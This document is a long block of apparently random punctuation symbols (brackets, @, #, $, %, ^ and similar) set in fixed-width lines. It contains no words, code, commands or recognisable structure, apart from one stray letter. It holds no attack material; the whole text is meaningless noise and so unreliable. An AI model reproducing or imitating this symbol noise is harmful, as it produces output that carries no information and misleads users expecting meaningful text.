@(&&@}]]!@]$}@*}#(^[%^!_(&+(!)[**(&_!*_*!*))+&@)%&{#*[%[{@+$^&@]__][#_)^+)#^&)}[
_&$)](!^{&@(&[&}$#%$%!%[#)}*_(!]%[}%__^%(@}}(^@_(&]^^#]!%@{}{&*+@)&(#$#+%*&@{_]!
}&&[(_*_%&($%(@#){@_+}$!])}%$_[+$(@)_}![_&*%_[!$}*#}&]{[^+&![}%_#{#$[{)({$$[}{%$
^!!{{})))!{#^]*@&}]_)}[%()[](*%@[__%#*}&_(+!{#[)!@(]+]}$+%_{##[(+#$^*@&@{*}%)({!
*#^$(]))^^}{&})@**}!@[{{[*@^}!}}#))@*][[[##@)([_$#*+)]%#{]![$^[@!^@[([(){+$)(]]}
($)[!+#!)*($!}%!%)]{!@}][_{]({)*^[{%[#]$]![#^(!{_(@$@{]_^%!%]%[#%)_%%{@&)@{&}@*%
)}@&+[)!]__*(#*@)_[@}+}$!^&_^]*@!)_@!)$*()}[@*&}){%@}_@$[@]$*{_^}+[{}_}#+[&(^]]#
^^^@%#((}!_*[(}({}@{{)+*}$@!^)[_%(%}#!!)+&+#&%}$*${)](^+!!])#]@}[$^!}[}}[]#_@@]}
)+#&{${%+(*_$$^]}&#+^%())^_^@(_]*^]{))]+_)$@_%*([}{${^(]{[[#(#]&}+l}%#@}{{)%@{+}
{$})($)({%@]!]]_(#_$[@_][+_)(!^!&+*{@*$#$@$$)(@$*]]{{}])}+[}!^^]}@(*%^%![+)&$}]$
^%)[*%%@(@[#_+#{*#$%{_%*{_%{{#&[_@&!}#__)$+*+*$_[+*]+#*(}&}!*!_@#%%!^[+(}[}!*{!+
#(!^_#@^{$__!_*&+}@[%+&${}()@$&^(^{[%&]_}}%^}$&+&{]*+%][@%@@#*^(^*@+*#*^](_+!$)+
*{[]{@*]$%}{&#${_!%_(@(}_)){^(#_#@*}_]+))$_$[@+])^]{$]]__%*%(%}_@@^[[)^_[@(@&**+
@(_#_&[!%$@&)&![*(^$+!^$#&@!+_}_[_]&$!]^]#{
}([{]%@^+)[_[^*}[_[}$^(&)#*&&^)}!%{[{#_#(^%^_&_&_)!+}}*]@*($^$&*{[+&}*^&%])^%]*(
@[)+)%}]){)[##&+#_)(*(#&)}_&(()){*_!}*^[$^*+$@{++@_#%_^($*}_+([]*&^$()$+])&)!]}}
{(%$#(+))^{!]@()]]$%*]%&+&)_*_{_(()^$!!_[#+^@(%%([*#{)&+)))@*$@]#_)#}!__(_!%#*{]
(!%(^@)@_&%@)(_[(#@&^[+([)+%}^*{!)!{+(+&!)+%^{*_]+&*%&_*$])&^${%+#+^+!(}+&@]$+{*
]!@$})^+*$^!$$!}_&#})+{)}[_#^[(*!)@%{!!(&^#${++*#@&^&!]%}]{!$+*[*#]}{_{_!&){%[^_
{#_(_$(^)#*@(##^*@}}(+&{}_#{*^]&)+]!++)%[^%+!+%!++%+*&$]*$!**&$$$+(_!{[++(@#[+{_
+)^$]#]*#+#_&@$#&&]*]{_**##%#{}^!]{])&($@(+**[_!+_}&#!]^&@{*_@[&*${[+}@_{}}[]+#_
^+*#!**[_@#@))@@$!!)#%$%${[(&#(&_#[{*{%@##!^@*)_!{^{%[]+%]}}()[$%(_{$[[^{(]]@%{_
[^_(@[!*%*$][+@)^]+#$!_)@}!*_&$&%^@{*%)!(*[*)(}^&{{}_[$%)*()@%)#}_)#}{}##&]{$](#
]]_$[[@!))^*&^@!#_}{_)@$&[%#[]*!${%!#[{(%$*_*+$)]%#&$!){&&_%##_]*%$@^%@&&)*$_&(]
@}!^+[]&}{&{&%]*{_*#^++#+_&(%]+_&}}^^+@+]@])}[${%$*^@]{^^{+#(#*%*[&_*(+#(*[$[*]$
!}#_(#![^%%+(^&*(({%[]@^]$([@@@@*@@)&}@)^^{*^_@*{){*((%!($+^_!_!^$$_!(@+%&[!_$#$
[*%!@+*^{}&^&]}$#{*]!}{+#%@]$!+^$_*(@]@%})%$!{[&!({[##$))(@#+(%}@)$)*@++}%*&(#^{
@^[&[%*_%#$_}${#{@@^^![[_$(!$&}[&^}_*}@@_}*+^$%[*_(+}$)%{@)&^*&(*]&$!_[{)&{[[_@!
+_!]%^[)}}){!+{%}@##&@@([%&]+]+)!@}^}&@@_[[!(!+[&!)@*%@_#*(!({^}$++!#*^!]+^%*$$)
]^(]#}]+)[@__@]#$]{^)&@[{*+%%$(&}^!_++}&&@+]}*{!}^+#(@(@$[*%)*$((&*{*@#$)]*+_%@)
@^^]^^)()*+){!+&{$}+&{!{!+@}_*&*$}$){]}&{({_]%+{_)%(#@()]}@]]#+$*{*$$@{])${*($#}
@)+}!{*_}__)(@%*&}!*@#+!_#@!&^$&})&*]!}{]]$#]&$_@[*!)%_[}}_@+%{&_+_$^&^)]]&&}(*%
((@#$$(#[(@!({{}#&$*]$[{+!@@[@*#+_#)(*_^_(%#%&[%!(+}$&&)%)[{^$(]*{++})@_[%*%]*^+
%(@#)])+^_*+*#%+_+}^{{*[+%*]$)]&^*}+#}^!(^(^)^_*[&@[}_*+$!{(@+}]{_}[^$[+_][{*]]+
!#+$$_}!%^%$]}^!*)]+*(+{#{[%^&!!^_$*+@}_$($#)&!)$_))*+##$&$$(]]^@_@_(!^%{_&@&+^{
*]!^&+%_}#@&&]%}@#^#!##*#[])*#}*](){+*}@)]+)](_(+&%{#}}})_!+*_}%%}%}(#!&*+{!!]](
+_%_([_&$*{^$*)_)#*@^_+#({$][)%@$^@$[&!+}*^$(^!)()){&&^{)]&)]{@)$_]*^@]&)@$#%#](
)+}[@({%[$!(](!)_)#[&[]}^]@*#([}^]@%%%@}[)($($]&^+$][*(%%+*$}%_]]$!@+(_%+&+{))@}
*_$#^{%_^_{$}$]^&)_!_#$[}#$}}%(*&)%+++&$[{]!#{^_{(*$[({(&(_$)])%]#(&)%$@]{${}@#&
]$&&]%^}^*#$@{#_&&(#%{)]+_[*{@^{@^%}_$[]$[((#@(+^}}!})!)$@})$%}*@]${+}%+_!!@@^*{
@^)[{#%&$*}$[*}#_^}%+}#^_+)^+$!_*#+)^_((^^+(*+[]][^(^^^&^}}}^*!(^]]*&+}[(#%)+(#!
&[&&_))#@+*^]_#[#{{$+!!%]]!!!$]^*!^^_+(%)%&@$}{&]$}#[[^($(*)]]%_(#}^((_@{)]}*#})
%$)$_%$]%!{)})!^@)[())#&#}@+_$##&$[#!}^^&_)%][]&$^#+@}_{@({[++&(_!@%@#&}^#[&[^%+
)[{^)#++[__(*+&*%(@]#](+(]]}%(^!(+@]({_[][)(%(&}}&[[_{#@#)@[#_[$#$[%[}{]{[)$)%{&
+&(@&%&^)(){)_[_]#^$)^)[!_]]&!)}+{_%(&+{(+%*}][^%)#{{+#@!$_*_[+[&}{*%+*!!%$))$(_
*@($]}^{[_&$@%^%#@([#_[_#_%]@(+^))]_@%%}%({_*^^@#_{$#_[&%{@$$^{%]}#!$^)+#)[%*^{$
$_[#^!+^[_&*%!^(%^![@^!_+{_(&*!!!$)]**^!%*$%{&*([+_!^]}&@^$)(_(%(%[}%#_^$#]@*^]!
%%][^]!%^%[@[{#!}[!}$@)@{^^[![[*$&$[#+{+(*)!^!)*+%*{{##[)%*!&#*[{%@!+((@##_}&+$*
({#!+*]+)$@+[[&#*!%(]&@^&#_^*@&@_((}_!!_^+#}%@_{%}$]&{{+{]+^]#*[^@]&}*_*}#!*_$#%
${!_{]{)$)#{*@+@@{$_]]+&+)^+!()[_*]{^^]*([(@!{&{}@()%_{+_[+&&@}{}(}$*%@$_^){*![{
(^@^&^@&!+#&(@%!)[]%((##@(}]_*#_*@%(_{$_#](#_]*]#_+_[_])(#&%#]_(!)]*$&*##){}]+*@
$+%([}$))^^!{}&%_%+$%&#[}^*_^^_#$$&^{@#}%[$&&({&^]}(}(@#*&#^)&{$(+^++$!*[{})]}^$
$#!&#[%{)(%&}^}[]()]$@])$])^#!]!%)_)!(])(}&*($%@%]#&(+^+]+%@[([@^]$_)&&%^*${[!_*
$)$__$+&@!@+#{]]@##(*]&+^}[!{(}%_}[]_^{(}@)}[$^{*_+@+[[$&#}^]^(})()())@*)!}[#^@{
(+_$$+]&#]+*^]))@}}**&[]}$]&!)^{)[]+#%$(}##!)_@$_)$_})[#%[!{*)_*(*)*$}#(^&){+]_]
()))_)+]{)*&)@!@&*__%{@*]&${]${@_&+)@&)*+*!][#_][(&])@}@!#^!+*@]!#)[+__&&%}_+$&$
]#({*#]_#]&*}_((+#!}]_}+&_+](!#%+@$}+@#&{}(&_}^*!#$_@}^*}${)_}%)_!@&#])%{#&)*!(#
##%*@!]##(_*{}@$!][]&+*#){(_!$$_]_^^]#{#))}_())[[)}@$+_}_*!{%%*![$*^#){([&&[}#%[
&]@_[@@_*)}!}#_})]_@)^[^&#&^!&{](&_[!&#}%!{)$[$()}*^#*{@&{]*$%$$*}@^+*)@(&(+%$_[
)*^{{![!&&[*]#)$}){^]%)@*]&^@@#}#*%#([]^&%}]&_)%!@@!*$%+*+#+_%%+$%#!%]+]{^{+[$%!$![^)[&#*@{+]#
_)*^@})]{])*@&]@#+$&(#$)!^$$][(*&(]))^[*^})!!#))(})]&@{}({_&)*$@{+!!]{($!{+@!({$
#*![]@@{%_^)+_#_][^$!)#*!^&]___}%%&_[}#(@+}^*)%[&!&}$^!!&]#!}(@!)%&^__@@{[+)[}#(
+@#}_*+$})@&_{_@@)(@#$!){}@${][#[#([)%[@&@@%[{%!&^#[!_{_@(&@}!^^*$(^*!%}+$)$]__%
_$%@%}*)!@[$+$[_[]^!][]{+!#]]*+&{){+)__$)_*%!{^&$&$!)*#_{{$!$!+[%[&$+!@!}@*_[$&_
)*$*}%(*^{}!$^$%*(!([##@&^*!+!%@[+[+)@({{_&**&#_@}$$[)%]@[}]}{*[++&)#)&!$!)_)}$+
#]!_^#^*%()^#&(]&}!}[[[{_&)#}#@^#[{__^]^#((^%%[}!)((%(@](#(())#{@)[!*](%}}))+!)(
})(*}]#$[_($^_)@+]@)_)*[&@]#+(_))]#}#@+#@@!_+#[_+_]*)[!$&@**_+!]@_]&[@%]+@[}%$})
_#)&&]&@}!&[&^*#!^&{*$[{+*)]&*##%!{@)@*!^_&@*#^%_]%(}]{_!)_%}_&&$$+^(_*())%#&&**
)(#!@+^!+(^+#^}[#($}*&*!@&[)+[@][[]])#&!%[++@!}]$%]*_{@%{@_!{#%([$@[^[}^!({!}^(*
[*&#$_*{$^!_!(}{*}]@($)%^)[}#&&_&@]__[$#*$*$^%]#!}[*&_@](#$_[#@]}!_[&+}[%]{)@#&)
]+(_@_{#]^^!&}%^(*^*[)#]({+@+@}#(*##{)&[#}]{!#!@+++^_](%+(()_^]*}!}!$(+}&{*_!@#]
)*@#}[}([%{[#^${[&)*[}#+(%^$@+]&@{$[^_^[*)@$]]+}{{^%&({](!&(%#^[!}&]$)+*@%%)_&{(
)%*@_]+][&{@$$]]+*}&+*{+$)$}^)!{+**!@[(])@)^*%@^@]}%^^!!$&!}^{&^@_+]_]$)*#({%]#*
[+%]@[^$%_}))_({_]%${)}_[}^+(%_+}*}*!_+^^@#]@{)}&[*#((#!$[@}$)!!]&[{)_#%]}*^@[@$$]&#[@[()${*#){)$(&*#(}@_%]})&[][*])+%#{{^
#}%)!))({*^@^_%@!)(@_+$&){[[(_+&^_@+%[&_*&#%#)[)^_[*+]+)[!^}]%&([}%@[+@&^^((^+^]
&(^[%[$!!]#]^_!!!&&{]}]]&)@#}@_]]]]${&#)@{}{!{@%*)^@{$^!^+@]$$$&)**_{[[(%)]@{*^(
_++]]}[%{(!!(*]_!^]{]$#{&$#$})+*}$^}&!]{}^_{#!}{(!%[%%{$%(}]@&$]#+]**!_#&[&$$!{^
#+*&!_^@@^_#$[&@(@$+&!)_^+{{__}#_)^+(@@{[){))@[+#*}_#]])^]^%^*_$#}]%)@@%*!!{^&+$
$_+($!%{_]$^+^@_()#^[[^)$+@))&}+_$[_&+{!$]}]%$_!}[@)}[_($^+#}_%*%@*+(^!+)()[#*_#
({}[*$@]#*[#&%#!^){@__[]#]@}^$*]$%%(^@^]+!}$#$#@$[@}{#+!)!#%%!#[(^*(*_+*{#%#)%(*
_@([()+#_){${^[__}+#%{[&{_@![{}+[#][)!&!&^$(_*_^^}[)&)}$%%)(#[)&)+!+{@^@%#__]$+]
{}+[(^{!(&)%*(@^#+#)*&{)[^+@#{{}&$]{{@_}@{&${#%]}*!@)}^{}!)(!(_$%((#%%%!{(_(_$@@
[@(!%!@_]!%*(+(^[_!_#!)[+@{(#%!%*]$&#@_@!*&){__(@@_}&*+){_^#^_}*+@*()[}){]!#!&^#
@!_%&))_^@!$)%^!*%@{+)@%$$]&{!*_!}@{&**(}&^+[@%(%*^$(^+{{($&]!_{})!*)_!}!%++[%)@
$){^@]#^{(!&][%]+[^**^$&*@&[)%%#$)%[^_[@^*+)@)}#&&#(_^+(%{)}}!@^+$&&$]{(^*(@]@%&
#+{$]$_[^{[*#}%@+}[@}+@**$})^@]#&[+(@^&%_%!$_}*@{]}}_(#@[*]}+!_#}))+]]&]]@$^^{+[
(!_}&&}&}!_@$#)]{!#^{%(#]#^&]#}^%{&&*}&(+@^+_%]#)#)_()[(_&!$+^#[%@+$]]]!!&^%[]!^
%%@%)]**%+_^${$(}]}^{]])@!%+@!$#!})!($%$@)+*[![}]&__[$%!&$^})%]^&%(+^+#@&^$]{{!)
[(%%!{![]#[^$%_!#]^)!]![])!$@+!^@{%}$@[_#_+{#](!^*(%#@_^}^__[(@&]}]@&!)_!$^%*(}[
+*}[%]*#@{_![]$+@_)]#@+]#_^(!*{#]!()@}}%!_&@]()()]*+(%*_{@)]#{[*^${_+$)@[{[$*!!{
%)+$^^[!!#^]^+*}#{_(^*!_!@]}[}%]}#]!(_+[[_)%!+($*@&$#*_{^@[()&+)$_[%}(^*^+}[^&^#
@$}]%(%&_&&*))&%$![}[$%}@!]^*}*)_{^$_!(%]^}!_#_$$^__)}[#^(]+@&^!&*($_[_$%])]*%%!
#!%+_{]$}($_+{^*}]&[@$^($^]()]+)+]+_]!*_^*^!@{]_){#+_#%(*#&#%(]*$[%%]$[}!&*!^^()
!}[}{!+^{@}!$)%+)}{*#}%}@]#}+_#+&(*)_]}#(!{(*&#&)$_{^%$*)]!##*}$}[_&(#^{&)%+{(_%
&[#$!&+}!*#%_!%+&&[@(![+*@}^%@)@+(_@(%{$[]_[%)}_))}$*#+$(]@%{#!)&_#@!!]{!}){&@@(
)(_)[&{!]%*{^{{]$_&]^![{_##($%)%}#})(]$&^^}&!#@@#]*^^$[)@}!!)@)_*$$[{@%)_^!}_^]]
})]]{!_@)[%!$#{&@!_+_$[_*@!@@@_(}$!$!%*($[%)[(]{[]#%*(**{#%$)_@_*]({^@!$))[$*$#+
[+!&#$$!})[{#(@{}&&@)&}^$!%_*@%#*)++{+]@}{@}*@^!}+])+{[^*#%(*(+$_!{])}+$](!*{{[{
^[#++^*[_^&![@&^^])&%#_*}^$(#^&[&(#(@{)%$(%]*%!)^*+[!_%@^+&(+([(^)#[{***![{*$@[[
]}_&]{[})+[^+%!^^@&[+[)$%)}(%}&[_}}(&#^]#!@(+*)){([)**({{^]@_}+@$%{)_&{[{_}{_[_#
!&@@$][{)_{$_)[&+]^!$*]}]+[$$#+@*_}$*!#]()*[[&{*!#)(@%+%[{)@@@}}[}&[+)[}{_^}*{+[
$}([#)%(!(#[([@^)%+[#&[#%)}+&*{(^*(])^{_]%{^+^^}{#&#[*$^*{#!&](}_#$++#]$[^%+}*&@
]+]@]&[{*!)[{(((^&$%}[^#[+][@_%!#[}][}^{%{^*(!!*+)^]][+{_%^*^&+{#{$}#$%_!*!&*#^!
%*)_@)+_$+[&@*{@(+^@&({##}#{*([^_+@]*{+@})!)&))]@@[(({!!)*(}($__(]+*}[}&+@}]$$]*
%%%@$+$]$!%@(&]]}{([_$*_)(}$]&*[%_#**^(!$#(+}$}))$]]!#^&[}]#!&$){@({$%(&@*}](+@]
_@[(%)])^!#(}_}!)$%@*+]@{&(^}!([!%$!!]@$$!}*%!_#{($*]+(!@@)_(+^]*#*)]){}!_^&&&]&
)[^@$+%]@%){!]]}}$!&}###)&[[@$)_*@}^[**)+#{{}_{#]!+(}%]$###{(!]*+[&+^(_(&$)_%]![
})+$)#]](#!{+)(${$*)[)$_&)[_%)+@*_]]{[{&_!}%%*$+]@%#^}^+*_}$!}@$]@&[{%(&%](}!)&*
%![[!$$^]}*!$[&_{_@](+(_}@_@^{$+%&(+[((@}[&${@%@[@%]})$)&&#*(%}_)]%%&@]&&{[*#@@@
!^__!&+^_@_){}[)*[#__[[+&{(!*&[!_@*&}*)%{*+{(^++^!][&#))*]*^_&^+({)[)$#+(+%{&[^(
*}*&*#[*!+^^#}!($[!&@!&_*$}+%&(%$!!^$#]&*[#)[}!^^@+^+#)^$])$^[%#[_+}]_)$}+[!]%*$
@_%]^@}))}*&){!%^{_(!]&+*%!*)@)@%$%{[@**!)#!%@+&!)@{[})*@)*[+}((])*)[{!@#[[}}*!+
(!%$^({*[^#&_](^]*%_}*}@+(}!}*}%$)[$}_{###@*&})_+%!*)[#__*]){_^&$%+$*@{%!}!!(![!
$(){)%!+{!_]+][}(($!_+^&_+_#&{%)$_#)!#_+@[{#*{]^+)@%&{@$$$@+_+^[%&(&#^^%}}%!)&&*
!([+{#(+})+${@*!{]}_^&_^}(@(](%^)%+[$!^^@_}[&][}@*]{@[]$#$@)++#&)#@[#)^(@{[!)}!&
###*#()&#*}%$#@^(*[!+#}*(}*!&{*$%%@@%[)_{))(+)[#_}$(^#$%}!$(#+(*{]![(]]^)@##@{#%
]*{+#%@^_%[+${+]{{]@@#%!+}#_{_(^!^}%[{$(@]&[#^_^}$!}%}@$(&[&**]++[*!(!@$[@&+]+(]
]^!]})@%_([{)(+$^{{_+_&_^&!+}*(}%&)+(^}{)@*^#(%[{]_+^!%!_++_[{}(_[}@$@]!^*_+{&{]
@}]}*!#@%{{)**)&!#@#{}(_*^))[{](@!(#!)}]}$]++]_$!+(!)[&}^])+(]#$[%&]#@%^](&&#+]{
[(*}*[{(%&_{#^}#*([&)*$+__#^@%]#^@])^*)$_^}@(_%+*}%%^_+###_{+*_$]%$%*[@%_((_#[+&
![%({@]#{]+*{@{!+]$+&^)_$[([([!!%&&+]^{_)*[#[)[*&}){%%]@$([@{%!(#+]^@(%*}([!^[_(
(]](}^]#}_!@!#)!+_}&!+_()]{&+]_+*[([))$_)$!#(+@@*_[$)$[!^&%@{^%{@%+!+{$&[#!&!$!^
+]@#[&&*[^$(@&&{((^)%[%%@[])&}%]]^[)]&@{*@([($_]_{[[@}^(%#]@^]^$%_!%_$+*@&+[+)(&
@)[$#+[}#[}^!)$+!_[}@&}**{+&%$](_&](&[]){($_^}}*!_*!]@$+($%]){[_^^_%([)_$@(*###@
}^*&%}{%[^]$&*]_%@&&]))$_@%[@@}!^@%[!_#@(#[[$_&!_+)@+!*#*({)**(]&])#^][[%_%[}${]
]_(!%@$++])^+_!#___(^#{!(}^${%[##+]+[!%%*&{*#^$]#[$}(^@_%*$[@][%{#*$[^*]&}[+#*+!
]#)}]&#}&%^$]%!#$!{)[*%))!!%_%*%%#@@*}&[&@([[})$&($*}+*&((%$}+$})(^^_%!+%+(@#]#)
}${@&$![)#)$$(#][(%{$+(({[)$$@%}+#*]%{&[#_}@_%%@!]+){{@}&}%*][}+*]*%@@{{}**+{%^)
%]![]!$_)@(@#+)[$(^![&@})%]}{%*%%+!]]}+&@^*^__%&*$]]}$^$)$}*@}+}{}_)[{_+_+%^[)}!
$*^%$%$+}_)#%+[}*)!](!^*&[*[%+[&+$^$@]!(!]+[!}+(&*^&#}@}([]*@$]]%_{]$*!_{)(!+_+@
((!&}!({^(#*(*#@%__(_)])*])($}[]&@_{(#*_&$&++&@(}@)+^&#+})@{]({]&})&_^*]_#^}$$)[
*$}(@^{[[#_{*^)+(_@&@)*^]@{$]+}*+@}!^[!!$^@*_*_!$!_{][{#*!%{^[&[}*%!(_@+*^*(+_}[
&#&]#_$}@_]$@_+_)%*@^${)$(^&**$!{)+[%]%!!@%^&$[)%&*&]^+$}#}{^_*}%&)!*%[[!!#_*@+[
^@^$!{_^&%%]@&_)}&_@#%*{!*[(($#[[}{#&_+%&+{*_*$%[{{[[$@@^_%(*#)#@%{*)#&)]{[_{(]+
^*&#%!%){+#)!%@]]{#&^)_{%&+[*](%@+]]}}&+@&]#}{{*@+]_!^@@)_[@_)@)&]%{_#]$_!({_!!_
$&{(@*{_$$*)(^*[)+_{!+%}+)}!}$^#++@@^$@[${%+([+_[&]}_$]!^%_+$%*[!%(()%$%{!@{^*@#
_&$)]^!(!*%&#+)^)^$&}(((!^%*[+({(&!*_#[@)!_}%!_{_)%_)$%$^%^!+)*&_*)*@})&&@#@*]}@
_@+#+&[^$#[&)%+@]!*(}@+#*[^@]%#^!*#+#$()+))[!)]]}@)!]*@#&#*!$&@!{]{^$*{{$$]%&++[
^(_}{%%}+%](#+}^&@*){+]@]}{)!@[#{!(%{!&@({_}{_#&(^()[}[[%##*{}$}$$()}&@++[!%}@$_
_[!(_^@{#[$))(#$^]*_%[$!&]$!@_+[#%@+()^[(]&!)[{$+*$)#)@)_@_)([%[&{&^[}*+!_]_}]##
)*!@&[+$}#!&@{&@+#[]*)}!_+}){{+)@!}!!#(#)_#!{][}@{^#}}_$]&*%*[^(@]]*@($]$$]$_+^[
$$%][[_^[*$*)(+_]{]}$%&}}(^{+#&]$&^&!!{[[@)_%!][_]@![[$_%}_[[{]!_*}[&{$+![_%(#!}
$)#^)#*&*+(#)#*$+)#]_%]%!+(()+_^({$**[}%@*!_)}%!@[_+$_))&(**}][$([)%{}#}&(]}[&+(
$&+!*]!{+_&@@}}@!&}@#%*{}%_^]%(_%)^!#(]^^@@}}(}_&#+_+*$!}[)*^_#!)+@(%]&#[_)[({*+
#!}^#^]]@$[(%&}#!#$+)^#$++*+^_]_)[$_]((+(}+*_#&*{}_&+%#+@&!}#%]#)@&__}@})}))*]*_
#)$&%%)%$+#&[(&*&^$*%@[)_)^(%^()!]!{$$*}(]}#_)}+*&&$}^(@)$^+*+%*(]+}_!$%@&%@_}*[
*[*$$@}@_![^]+_}!&_&{^+!@{{^@}}_*))%)]]}#*[*@+@#^+[+(#)]{_&&%@$&$$@}*}!%_!^*((%[
^*!_(${)(_+)!))$&!*%^#@!${($*)^)@+@+*}%(}@(+@#^%![([%*)@@)++*!@&(+[$_*^$}%)})^)^
_+[{__[@(&%!)^!^^@}![{{^]$!(]!{}!*^)@)_^$][#+}$[(])]&+@^_[]@^@&^$]$&!@_)[$$[(_#)
+^})*$%&!#)!)}*[#&@!_{&)[&@*@^#_(%!*]%#!#)(^[^@[%)&!+]#${%{&#{+^^___@+[{]%&!#((#
@@^})&)$@[@*&#$&+*!)]*+%#]$%$(}&!#}*[))(]@#+_%_#]}}+(^[_)&##&^&){[#{*+#)}#!!&#!}
+*#(}@^(+^+[^(]]^{*}}_^{@&+(}(+)%+}[!*@)#{{#{#&_&$*+&%[_!)($([+%$^$!)%]%&^[^@@%+
(*(*#_*_](@!$$#{&#*!)_@#})_]^$$^)[^*!*@!#})]){}{^{@)#&}[^^])!$^${^$$#{]^}#_*+!%{
^!+@#@[)@{^){{])#((!(@!%&$%#+}#&!^}+(#()^){}]{)!(%)^#}#)!*+}))+(+(&&[+%[##*$[)}]
_(@}(^[&@)^&}#+}{#(!@$@&*@+}%(@)]!#_#){^%^%_[&+[(&{^[**@^(&]+!#(}&%]_^_{(&**$@*_
}{{$&)^##]()_}_}])@$[$]}%}(^[^{(!%[)$[]^[{+(!}%]^#&#!*^%)^(&])%!#($[+^[($%$&$[(]
(+}%$*@+{)&]@+_[_]!!^^&#_&(^$[*}])%+{(@$$+_}%)}^)(&#)_(()!@[]&*++^]#$)!*]*+)^$[(
{}@*^[@)@![+#^$!%$!_!+_^*@$@@@$$+[$+}*)}#{))&)]^@($[__+%&+__}$_&#}[#&[)}^^]}}]]}
!*&^%]+_@#+[[@_%+$!@$%!^)*^}(+}$&&!!*_[}+@*@)^_%]]$%!&%*+_[&![}(*!}!+(*+[#}{_)}*
&&!]+++^^#{#__$@&([)*}]%$+@##}[&[*]_{*@]%&!)$}@&}!^)&@$+@#&!%#+*%[*[]$)##)##_+{{
$@^)[($^}@%}(&&)_}$%}&{$)@[+!}+^]+{$+$({_[)@*)&!{}+[$*}#!}@_{{(]]@*%*)]%_}%[{&$)
*_![&()!%]@[{[@%_)$$^#+$)_$]+_*_{%&{*__#_*+^_)$[%&@}}##+(}{%#+!%]!({$+_(}^@^#_@+
!($(#@)*%{]*+$++)]{){{@#}%)^]#{&){^+]+]++{_)&$*+&][}&#^^{__{))^^{&@{%+][[{*!_!+$
(&*}]{%{#!^!**+}[(}^}!%){(!&#^[+![*$&${]^(])#&[#](}[%%*${[)(*@_@_(((+@(({]%#})%)
#&^#*&+$)&($]!+]&^$@)#*^_^]{#%)*_@^!_+*+*{](*&[}*[[]#*%!*(&!(@)[))!%%)&@_{{!@({#
!_}![($%)}__*&%(^_&+){_#]{_!]&(@^{[#)%)(++&{{^}!^}&%$#%_}_!($%]$}_()&&#{))$(%*&{
([^@+^![{@%_@@@!(%}#@})#_){@__^@_[_!^$(#!^^(@}]+${)]*_^%@$%$(_^]@_$+^_!#}(]%+%[@
@)][!!*((]}^(*([__#*#}%$!]+&_[}*@(@^()_*]%&%)&[){((@*%%+)@$+_+{]^$+{%^%}@[*_${]!
[!^%%$+%*%&&!!&+^])}&^$$!*&(#){&^&[$}#*&}%#(}@@_*}*(}]_*}%*]+&){*{_&^%+]$)&($!!_
#(&$*!@^*[&#@(#[{]{%@!@[#@@[+%_{^[]%(]#&^$&+{{$+*@+_(&^{^!)}+^$$(*)${(%@_{!{}(#(
}{#$_!*^)@}&%*^_&^)])[#!}##^%@]([[{@_*}$^(}%&+&{[@#)){$[+){@}$]{)@_){{^($*_[($+@
@@@$]&@{_#[{!&$!%##+&(%@)^_}+^%#@{^{%[*%{&#[}(^}%((@#&_)}^][#})[%%}(_)_+*%{^*{}_
{%(#+(@%($*&%*##^+){([%[_&#(]*@+_!^_{%{@%_&%&[[$%+)@{[&(_@%+*{#_*!%+&[*(+{+*$})+
#%[^{#(_}!+!$)%@{}&^#+_](]+)}_([*@[^#$@&}]}*!@{@[++$++(&]_}@{+}#%)}+&_$[}%[%{+@)
#@%{&_@})$}*&!$}@^&[}%*!$(](#[#$+}@#%&(+($*}$]%]$$]$*%%%
$(+((!)){*&!@_%((^${&($@+[!!])&!#%)_$[{$]&[)@[$[^)$^#^)@^]%[&{*[_{}&$)_)+}$#}{$(
#_)}}@^${#%)@@[]]}]%$_#&}[@%{{(+{@%)_^%}*^}$#]$!{)#])&#^(]]#}^^*])*#$#@()^!)$$!@
+_[)*^_*^+(_]){*!^&][&!])$_@@]!@*!*$^+&@__##^##[%_^[@)_$%^^_&+@^{(}#]+#}$[^!*(_^
[[^#(%%([#)${*]}#$+))%}&#_](}$+*@]#]**$+@{}&{*[{%*[@^)+]([]{![_&&!_}#${%@]!(+%!}
%*#}![%&$]^!+({}+])()[]_$(^#)*^$}$^)%]{&#^)!^$}!_&++#&_[&!!_#$!_%#}[+)+@}^_)&&__
*}&+*{^[!#!}&+_(+]_#*+^@*({%((])}%%!%+#^_&^}[*#{])()]@#%@^$[$^!_)!@_@({@#&@%$+)]
_^{+#$@^*^{%]]^&)&}!_}[@[({[+){+%%+&_@}@^&#$#_[*_[%{){_[]*!$]^__{)!%[#^_*+!)&&%@
]{{{%[@_%)^&]{#($]&&$}#%++)*+&#__}&$*{]@}@}{{+*}!&{&#{[++*)}&{%*)!)_@@}%#@@+{)[!
$+**(@!{%!@^^]^#(@}[]@]#^[*+*[^!*_&))*_&((]#}&^$^!#+[)(#+(}[^(%}[${*)[@(&^^*{{%$
^^_)&([^()^!@)!}&$@([&%@${[$%#@}+@_*!}&]%]#_[]([%]+}}&[&![_}*+)}{&*)@*)@@$_^]@^%
)^%({{%_^_+@%%+#[#$$@#_&%##{+)+$%*((!{{}{]+%%+^_!+{@]{^^+^}{[_([_^)!%_[+%@!%!@(+
@&$^$(+^^]$$**{^&*&!_[_{_)*[{@![@%+@){*{&}%_%(%(@+{!&)![$$+(}^)[]##$^($+[#]}!_#&
_^]!$_)[]+@)_*@![_($+!@[#)&]!+&(_*]]%%_@*@!&&_!{^*#{+[%$$##[]@&[#{$^%@&$([{+_#{(
})_{&{}#_+&@$)}#&]$(&}+&+!&_[]%@}[@^]{)!_*+$!$(}+*%{!*)]}@%!*&!}([*+]*%*)_%}(@^]
%&[^!%!%]$!((+&%%@)!%_!+#^&}&$*^%%)#%#_%+[_$^#)%#@})]%^![^]*$&%^@)$+##}]#*]&$*()
&)))+&^[_}()^@@!)&]&&!$*!#+#()^{]__@!+%(({[__&**]&!*(@+!{^@^*[!)@#))$!]^[%}]#(![
*)$_($)){@%}}*+*#{]}}@)!){$+$^&$!]*)$_**(_+@)+{)![!&+&_#[_$%^+&^}&**&_*)]+)]]%{!
]*$[$^$^+%&*!&[(%(^+&{+&]+*&$_!+{)#]#}{+***)+}&@%!^{{@+#^&*$)&^_&!@!#%^%!@]){{+]
@)$%{&+{@)+)&^&*(!(%^_&+]%_)]_+!)@!)$$@}(@@$#^[%$(&@[(($}!&^#]()[%){]@]$*[{)&%})
!+!{%[)[(%$#[*)]@!^{#^@}&]&([^*{$#$&%#@][)^+!%@]]]$$(!$@[&]{%%!^&(+{!&#*_]$@_$^]
$*&}_&$!]%+[){+{@[(&!%@&$*@()&!@}@^!#]!)#^*{)^}}+@[[!_}@![$]!((&+]}}@%^]@[]])%_&
